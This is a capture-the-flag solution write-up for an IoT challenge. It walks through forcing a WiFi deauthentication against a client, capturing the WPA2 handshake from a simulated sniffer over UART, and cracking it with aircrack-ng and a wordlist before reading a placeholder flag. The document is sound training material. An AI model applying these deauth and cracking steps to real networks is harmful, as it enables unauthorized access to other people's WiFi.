122 lines
2.3 KiB
Markdown
122 lines
2.3 KiB
Markdown
# Cr4cK_W1F1
|
|
|
|
| Field | Value |
|
|
|-------|-------|
|
|
| Category | IoT |
|
|
| Difficulty | Medium |
|
|
| Points | TBD |
|
|
| Author | Eun0us |
|
|
| CTF | Espilon 2026 |
|
|
|
|
---
|
|
|
|
## Description
|
|
|
|
You recover a UART access on a red team WiFi sniffer tool.
|
|
Analyze the captured data to recover the WiFi password, then connect to the network and
|
|
retrieve the flag.
|
|
|
|
- TX (read UART): port 1111
|
|
- RX (write UART): port 2222
|
|
|
|
---
|
|
|
|
## TL;DR
|
|
|
|
Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART
|
|
output (base64-encoded), crack the handshake with `aircrack-ng` and `rockyou.txt` to find
|
|
the passphrase `sunshine`, then connect and read the flag.
|
|
|
|
---
|
|
|
|
## Tools
|
|
|
|
| Tool | Purpose |
|
|
|------|---------|
|
|
| `nc` | Connect to UART TX/RX ports |
|
|
| `base64` | Decode the PCAP blob |
|
|
| `aircrack-ng` | Crack WPA2 handshake |
|
|
| `rockyou.txt` | Password wordlist |
|
|
|
|
---
|
|
|
|
## Solution
|
|
|
|
|
|
|
|
### Step 1 — Open both UART channels
|
|
|
|
```bash
|
|
# Terminal 1 — TX (read output)
|
|
nc <host> 1111
|
|
|
|
# Terminal 2 — RX (send commands)
|
|
nc <host> 2222
|
|
```
|
|
|
|
> 📸 `[screenshot: two terminals showing TX output and RX prompt]`
|
|
|
|
### Step 2 — Start the sniffer and force a deauth
|
|
|
|
In the RX terminal:
|
|
|
|
```text
|
|
sniffer start
|
|
deauth TestNet 02:00:00:aa:00:01
|
|
sniffer stop
|
|
```
|
|
|
|
The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake.
|
|
|
|
### Step 3 — Extract the PCAP from TX
|
|
|
|
On the TX terminal, output appears between markers:
|
|
|
|
```text
|
|
PCAP_BASE64_BEGIN
|
|
<base64 data>
|
|
PCAP_BASE64_END
|
|
```
|
|
|
|
Copy the base64 lines to a file and decode:
|
|
|
|
```bash
|
|
base64 -d handshake.b64 > handshake.pcap
|
|
```
|
|
|
|
> 📸 `[screenshot: TX output showing the PCAP_BASE64 markers]`
|
|
|
|
### Step 4 — Crack the WPA2 handshake
|
|
|
|
```bash
|
|
aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
|
|
```
|
|
|
|
Output:
|
|
|
|
```
|
|
KEY FOUND! [ sunshine ]
|
|
```
|
|
|
|
> 📸 `[screenshot: aircrack-ng finding the key]`
|
|
|
|
### Step 5 — Connect and read the flag
|
|
|
|
In the RX terminal:
|
|
|
|
```text
|
|
connect TestNet sunshine
|
|
cat /flag.txt
|
|
```
|
|
|
|
> 📸 `[screenshot: RX terminal returning the flag after connecting to the network]`
|
|
|
|
---
|
|
|
|
## Flag
|
|
|
|
`CTF{CR4CK_W1F1_EXAMPLE}`
|
|
|
|
> Note: This challenge was still being finalized at time of writing. The flag above is
|
|
> a placeholder; the real flag will be updated before deployment.
|